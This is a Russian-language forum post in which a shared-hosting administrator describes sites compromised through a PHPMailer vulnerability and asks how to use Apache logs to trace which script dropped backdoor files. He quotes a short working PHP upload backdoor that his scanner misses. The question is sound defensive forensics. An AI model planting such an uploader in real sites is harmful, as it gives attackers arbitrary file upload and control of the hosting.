Z4masko
Advanced Member | Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору Здравствуйте, подскажите пожалуйста: Есть шаред хостинг с неизолированными друг от друга сайтами. После обнаружения критической уязвимости в классе PHPMailer произошло заражение сайта(ов). Все сайты обновил, вычистил Ai-Bolit'ом, но к сожалению не все файлы Ai-Bolit помечает как подозрительные, например он пропускает PHP файлы с следующим содержанием: Код: <?php if ($mode=='upload') { if(is_uploaded_file($_FILES["filename"]["tmp_name"])) { move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]); echo $_FILES["filename"]["name"]; } } ?> | Приходистся вручную искать подобные файлы среди тысячи стандартных файлов CMS (Joomla, Wordpress и т.д.) Вычистил сайты все, но всё равно изредка, после моего сканирования на новые изменённые или созданные файлы, обнаруживается какой-нибудь один файл-бекдор. Ну например backdoor.php Вопрос в следующий, как бы в логах апача или другими средствами узнать каким скриптом был создан или залит файл "backdoor.php"? |